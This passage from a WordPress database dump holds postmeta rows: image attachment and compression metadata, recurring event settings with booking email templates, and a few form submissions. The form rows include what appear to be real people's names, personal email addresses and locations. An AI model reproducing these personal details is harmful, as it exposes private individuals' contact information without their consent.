uare\";a:4:{s:4:\"file\";s:23:\"butterfly-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:23:\"butterfly-1-300x364.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"butterfly-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(145737,265538,'original-file','2021/08/butterfly-1-updraft-pre-smush-original.jpg'),(145738,265538,'smush-complete','1'),(145739,265538,'smush-info','The file was compressed from 62.55 KB to 60.40 KB saving 3.43 percent using WP-Optimize'),(145740,265538,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:64051;s:12:\"smushed-size\";i:61852;s:15:\"savings-percent\";d:3.430000000000000159872115546022541821002960205078125;}'),(145741,265539,'mec_moved_online_link',''),(145742,265539,'mec_cancelled_reason',''),(145743,265539,'mec_display_cancellation_reason_in_single_page',''),(145744,265539,'boldgrid_hide_page_title','0'),(145745,265539,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(145746,265539,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-10-06\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-10-06\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(145747,265539,'mec_currency','a:0:{}'),(145748,265539,'mec_additional_organizer_ids','a:0:{}'),(145749,265539,'mec_additional_location_ids','a:0:{}'),(145750,265539,'mec_cost',''),(145751,265539,'mec_more_info_target','_self'),(145752,265539,'mec_more_info_title',''),(145753,265539,'mec_organizer_id','1'),(145754,265539,'mec_read_more',''),(145755,265539,'mec_more_info',''),(145756,265539,'mec_repeat_type',''),(145757,265539,'mec_repeat_status','0'),(145758,265539,'mec_end_day_seconds','72000'),(145759,265539,'mec_end_time_ampm','PM'),(145760,265539,'mec_end_time_minutes','0'),(145761,265539,'mec_end_time_hour','8'),(145762,265539,'mec_end_date','2021-10-06'),(145763,265539,'mec_start_day_seconds','68400'),(145764,265539,'mec_start_time_ampm','PM'),(145765,265539,'mec_start_time_minutes','0'),(145766,265539,'mec_public','1'),(145767,265539,'mec_start_date','2021-10-06'),(145768,265539,'mec_start_time_hour','7'),(145769,265539,'mec_countdown_method','global'),(145770,265539,'mec_timezone','global'),(145771,265539,'mec_comment',''),(145772,265539,'one_occurrence','0'),(145773,265539,'mec_hide_time','0'),(145774,265539,'mec_hide_end_time','0'),(145775,265539,'mec_event_status','EventScheduled'),(145776,265539,'mec_fields','a:0:{}'),(145777,265539,'mec_op','a:0:{}'),(145778,265539,'mec_bfixed_fields','a:0:{}'),(145779,265539,'mec_reg_fields','a:0:{}'),(145780,265539,'mec_reg_fields_global_inheritance','1'),(145781,265539,'mec_ticket_variations','a:0:{}'),(145782,265539,'mec_ticket_variations_global_inheritance','1'),(145783,265539,'mec_fees','a:0:{}'),(145784,265539,'mec_booking','a:0:{}'),(145785,265539,'mec_tickets','a:0:{}'),(145786,265539,'mec_fees_global_inheritance','1'),(145787,265539,'mec_hourly_schedules','a:0:{}'),(145788,265539,'mec_not_in_days',''),(145789,265539,'mec_in_days',''),(145790,265539,'mec_repeat_end_at_date',''),(145791,265539,'mec_advanced_days','a:0:{}'),(145792,265539,'passster_protection_type','password'),(145793,265539,'passster_activate_global_protection',NULL),(145794,265539,'passster_activate_protection',NULL),(145795,265539,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(145796,265539,'mec_repeat_end_at_occurrences',''),(145797,265539,'mec_repeat_end',''),(145798,265539,'mec_repeat_interval','1'),(145799,265539,'mec_allday','0'),(145800,265539,'mec_certain_weekdays','a:0:{}'),(145801,265539,'mec_dont_show_map','0'),(145802,265539,'mec_location_id','118'),(145803,265539,'mec_color',''),(145804,265539,'protect_children',''),(145805,265539,'_edit_lock','1630684021:2'),(145806,265539,'_edit_last','2'),(145807,265539,'_thumbnail_id','265540'),(145808,265540,'_wp_attached_file','2021/09/black-white-connection.jpg'),(145809,265540,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:659;s:6:\"height\";i:370;s:4:\"file\";s:34:\"2021/09/black-white-connection.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"black-white-connection-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"black-white-connection-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:34:\"black-white-connection-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:34:\"black-white-connection-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:34:\"black-white-connection-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:34:\"black-white-connection-300x370.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:370;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"black-white-connection-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(145810,265540,'original-file','2021/09/black-white-connection-updraft-pre-smush-original.jpg'),(145811,265540,'smush-complete','1'),(145812,265540,'smush-info','The file was compressed from 26.74 KB to 22.53 KB saving 15.74 percent using WP-Optimize'),(145813,265540,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:27385;s:12:\"smushed-size\";i:23075;s:15:\"savings-percent\";d:15.7400000000000002131628207280300557613372802734375;}'),(193693,269203,'_seq_num','62'),(193692,269203,'_form_id','61'),(146609,264020,'passster_activate_global_protection',NULL),(145819,265547,'_field_180','Tyler'),(145820,265547,'_field_181','care4music2@yahoo.com'),(145821,265547,'_field_182','CO'),(145822,265547,'_field_183','US'),(145823,265547,'_field_184','a:2:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";i:1;s:8:\"Loveland\";}'),(145824,265547,'_form_id','17'),(145825,265547,'_seq_num','6'),(145826,265548,'_field_133','Rhonda'),(145827,265548,'_field_134','Miller'),(145828,265548,'_field_135','rhoann9@gmail.com'),(145829,265548,'_field_137','RESA contact'),(145830,265548,'_field_138','I currently live in Boulder and am wondering if there is a RESA in my area. Thank you. '),(145831,265548,'_form_id','13'),(145832,265548,'_seq_num','79'),(145833,247330,'_wp_old_date','2021-05-22'),(145835,247336,'_wp_old_date','2021-05-22'),(145837,265030,'_wp_old_date','2021-05-22'),(145839,264903,'_wp_old_date','2021-05-22'),(145841,264902,'_wp_old_date','2021-05-22'),(145843,264901,'_wp_old_date','2021-05-22'),(145849,247342,'_wp_old_date','2021-05-22'),(145851,261921,'_wp_old_date','2021-05-22'),(145853,247343,'_wp_old_date','2021-05-22'),(145855,247344,'_wp_old_date','2021-05-22'),(145859,247345,'_wp_old_date','2021-05-22'),(177213,267955,'mec_date','1676197800:1676244600'),(145869,247332,'_wp_old_date','2021-05-22'),(179388,268208,'mec_repeat_type',''),(145893,265555,'mec_moved_online_link',''),(145894,265555,'mec_cancelled_reason',''),(145895,265555,'mec_display_cancellation_reason_in_single_page',''),(145896,265555,'boldgrid_hide_page_title','0'),(145897,265555,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(145898,265555,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-09-22\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-09-22\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(145899,265555,'mec_currency','a:0:{}'),(145900,265555,'mec_additional_organizer_ids','a:0:{}'),(145901,265555,'mec_additional_location_ids','a:0:{}'),(145902,265555,'mec_cost',''),(145903,265555,'mec_more_info_target','_self'),(145904,265555,'mec_more_info_title',''),(145905,265555,'mec_organizer_id','1'),(145906,265555,'mec_read_more',''),(145907,265555,'mec_more_info',''),(145908,265555,'mec_repeat_type',''),(145909,265555,'mec_repeat_status','0'),(145910,265555,'mec_end_day_seconds','70200'),(145911,265555,'mec_end_time_ampm','PM'),(145912,265555,'mec_end_time_minutes','30'),(145913,265555,'mec_end_time_hour','7'),(145914,265555,'mec_end_date','2021-09-22'),(145915,265555,'mec_start_day_seconds','66600'),(145916,265555,'mec_start_time_ampm','PM'),(145917,265555,'mec_start_time_minutes','30'),(145918,265555,'mec_public','1'),(145919,265555,'mec_start_date','2021-09-22'),(145920,265555,'mec_start_time_hour','6'),(145921,265555,'mec_countdown_method','global'),(145922,265555,'mec_timezone','global'),(145923,265555,'mec_comment',''),(145924,265555,'one_occurrence','0'),(145925,265555,'mec_hide_time','0'),(145926,265555,'mec_hide_end_time','0'),(145927,265555,'mec_event_status','EventScheduled'),(145928,265555,'mec_fields','a:0:{}'),(145929,265555,'mec_op','a:0:{}'),(145930,265555,'mec_bfixed_fields','a:0:{}'),(145931,265555,'mec_reg_fields','a:0:{}'),(145932,265555,'mec_reg_fields_global_inheritance','1'),(145933,265555,'mec_ticket_variations','a:0:{}'),(145934,265555,'mec_ticket_variations_global_inheritance','1'),(145935,265555,'mec_fees','a:0:{}'),(145936,265555,'mec_booking','a:0:{}'),(145937,265555,'mec_tickets','a:0:{}'),(145938,265555,'mec_fees_global_inheritance','1'),(145939,265555,'mec_hourly_schedules','a:0:{}'),(145940,265555,'mec_not_in_days',''),(145941,265555,'mec_in_days',''),(145942,265555,'mec_repeat_end_at_date',''),(145943,265555,'mec_advanced_days','a:0:{}'),(145944,265555,'passster_protection_type','password'),(145945,265555,'passster_activate_global_protection',NULL),(145946,265555,'passster_activate_protection',NULL),(145947,265555,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(145948,265555,'mec_repeat_end_at_occurrences',''),(145949,265555,'mec_repeat_end',''),(145950,265555,'mec_repeat_interval','1'),(145951,265555,'mec_allday','0'),(145952,265555,'mec_certain_weekdays','a:0:{}'),(145953,265555,'mec_dont_show_map','0'),(145954,265555,'mec_location_id','131'),(145955,265555,'mec_color',''),(145956,265555,'protect_children',''),(145957,265555,'_edit_lock','1631510507:2'),(145958,265555,'_edit_last','2'),(145991,265559,'mec_start_day_seconds','66600'),(145974,265559,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-09-29\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-09-29\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(145975,265559,'mec_currency','a:0:{}'),(145976,265559,'mec_additional_organizer_ids','a:0:{}'),(145977,265559,'mec_additional_location_ids','a:0:{}'),(145978,265559,'mec_cost',''),(145979,265559,'mec_more_info_target','_self'),(145980,265559,'mec_more_info_title',''),(145981,265559,'mec_organizer_id','1'),(145982,265559,'mec_read_more',''),(145983,265559,'mec_more_info',''),(145984,265559,'mec_repeat_type',''),(145985,265559,'mec_repeat_status','0'),(145986,265559,'mec_end_day_seconds','70200'),(145987,265559,'mec_end_time_ampm','PM'),(145988,265559,'mec_end_time_minutes','30'),(145989,265559,'mec_end_time_hour','7'),(145990,265559,'mec_end_date','2021-09-29'),(145973,265559,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(145972,265559,'boldgrid_hide_page_title','0'),(145968,265555,'_thumbnail_id','265557'),(145969,265559,'mec_moved_online_link',''),(145970,265559,'mec_cancelled_reason',''),(145971,265559,'mec_display_cancellation_reason_in_single_page',''),(145966,265557,'_wp_attached_file','2021/09/past-lives-dreams-st-2.jpg'),(145967,265557,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:655;s:6:\"height\";i:349;s:4:\"file\";s:34:\"2021/09/past-lives-dreams-st-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"past-lives-dreams-st-2-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"past-lives-dreams-st-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:34:\"past-lives-dreams-st-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:34:\"past-lives-dreams-st-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:34:\"past-lives-dreams-st-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:34:\"past-lives-dreams-st-2-300x349.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:349;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"past-lives-dreams-st-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(145992,265559,'mec_start_time_ampm','PM'),(145993,265559,'mec_start_time_minutes','30'),(145994,265559,'mec_public','1'),(145995,265559,'mec_start_date','2021-09-29'),(145996,265559,'mec_start_time_hour','6'),(145997,265559,'mec_countdown_method','global'),(145998,265559,'mec_timezone','global'),(145999,265559,'mec_comment',''),(146000,265559,'one_occurrence','0'),(146001,265559,'mec_hide_time','0'),(146002,265559,'mec_hide_end_time','0'),(146003,265559,'mec_event_status','EventScheduled'),(146004,265559,'mec_fields','a:0:{}'),(146005,265559,'mec_op','a:0:{}'),(146006,265559,'mec_bfixed_fields','a:0:{}'),(146007,265559,'mec_reg_fields','a:0:{}'),(146008,265559,'mec_reg_fields_global_inheritance','1'),(146009,265559,'mec_ticket_variations','a:0:{}'),(146010,265559,'mec_ticket_variations_global_inheritance','1'),(146011,265559,'mec_fees','a:0:{}'),(146012,265559,'mec_booking','a:0:{}'),(146013,265559,'mec_tickets','a:0:{}'),(146014,265559,'mec_fees_global_inheritance','1'),(146015,265559,'mec_hourly_schedules','a:0:{}'),(146016,265559,'mec_not_in_days',''),(146017,265559,'mec_in_days',''),(146018,265559,'mec_repeat_end_at_date',''),(146019,265559,'mec_advanced_days','a:0:{}'),(146020,265559,'passster_protection_type','password'),(146021,265559,'passster_activate_global_protection',NULL),(146022,265559,'passster_activate_protection',NULL),(146023,265559,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(146024,265559,'mec_repeat_end_at_occurrences',''),(146025,265559,'mec_repeat_end',''),(146026,265559,'mec_repeat_interval','1'),(146027,265559,'mec_allday','0'),(146028,265559,'mec_certain_weekdays','a:0:{}'),(146029,265559,'mec_dont_show_map','0'),(146030,265559,'mec_location_id','131'),(146031,265559,'mec_color',''),(146032,265559,'protect_children',''),(146033,265559,'_edit_lock','1631510562:2'),(146034,265559,'_edit_last','2'),(146035,265559,'_thumbnail_id','265557'),(146036,265560,'mec_moved_online_link',''),(146037,265560,'mec_cancelled_reason',''),(146038,265560,'mec_display_cancellation_reason_in_single_page',''),(146039,265560,'boldgrid_hide_page_title','0'),(146040,265560,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(146041,265560,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-10-06\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-10-06\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(146042,265560,'mec_currency','a:0:{}'),(146043,265560,'mec_additional_organizer_ids','a:0:{}'),(146044,265560,'mec_additional_location_ids','a:0:{}'),(146045,265560,'mec_cost',''),(146046,265560,'mec_more_info_target','_self'),(146047,265560,'mec_more_info_title',''),(146048,265560,'mec_organizer_id','1'),(146049,265560,'mec_read_more',''),(146050,265560,'mec_more_info',''),(146051,265560,'mec_repeat_type',''),(146052,265560,'mec_repeat_status','0'),(146053,265560,'mec_end_day_seconds','70200'),(146054,265560,'mec_end_time_ampm','PM'),(146055,265560,'mec_end_time_minutes','30'),(146056,265560,'mec_end_time_hour','7'),(146057,265560,'mec_end_date','2021-10-06'),(146058,265560,'mec_start_day_seconds','66600'),(146059,265560,'mec_start_time_ampm','PM'),(146060,265560,'mec_start_time_minutes','30'),(146061,265560,'mec_public','1'),(146062,265560,'mec_start_date','2021-10-06'),(146063,265560,'mec_start_time_hour','6'),(146064,265560,'mec_countdown_method','global'),(146065,265560,'mec_timezone','global'),(146066,265560,'mec_comment',''),(146067,265560,'one_occurrence','0'),(146068,265560,'mec_hide_time','0'),(146069,265560,'mec_hide_end_time','0'),(146070,265560,'mec_event_status','EventScheduled'),(146071,265560,'mec_fields','a:0:{}'),(146072,265560,'mec_op','a:0:{}'),(146073,265560,'mec_bfixed_fields','a:0:{}'),(146074,265560,'mec_reg_fields','a:0:{}'),(146075,265560,'mec_reg_fields_global_inheritance','1'),(146076,265560,'mec_ticket_variations','a:0:{}'),(146077,265560,'mec_ticket_variations_global_inheritance','1'),(146078,265560,'mec_fees','a:0:{}'),(146079,265560,'mec_booking','a:0:{}'),(146080,265560,'mec_tickets','a:0:{}'),(146081,265560,'mec_fees_global_inheritance','1'),(146082,265560,'mec_hourly_schedules','a:0:{}'),(146083,265560,'mec_not_in_days',''),(146084,265560,'mec_in_days',''),(146085,265560,'mec_repeat_end_at_date',''),(146086,265560,'mec_advanced_days','a:0:{}'),(146087,265560,'passster_protection_type','password'),(146088,265560,'passster_activate_global_protection',NULL),(146089,265560,'passster_activate_protection',NULL),(146090,265560,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(146091,265560,'mec_repeat_end_at_occurrences',''),(146092,265560,'mec_repeat_end',''),(146093,265560,'mec_repeat_interval','1'),(146094,265560,'mec_allday','0'),(146095,265560,'mec_certain_weekdays','a:0:{}'),(146096,265560,'mec_dont_show_map','0'),(146097,265560,'mec_location_id','131'),(146098,265560,'mec_color',''),(146099,265560,'protect_children',''),(146100,265560,'_edit_lock','1631510820:2'),(146101,265560,'_edit_last','2'),(146102,265560,'_thumbnail_id','265557'),(146103,265561,'mec_moved_online_link',''),(146104,265561,'mec_cancelled_reason',''),(146105,265561,'mec_display_cancellation_reason_in_single_page',''),(146106,265561,'boldgrid_hide_page_title','0'),(146107,265561,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(146108,265561,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-09-19\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-09-19\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"typ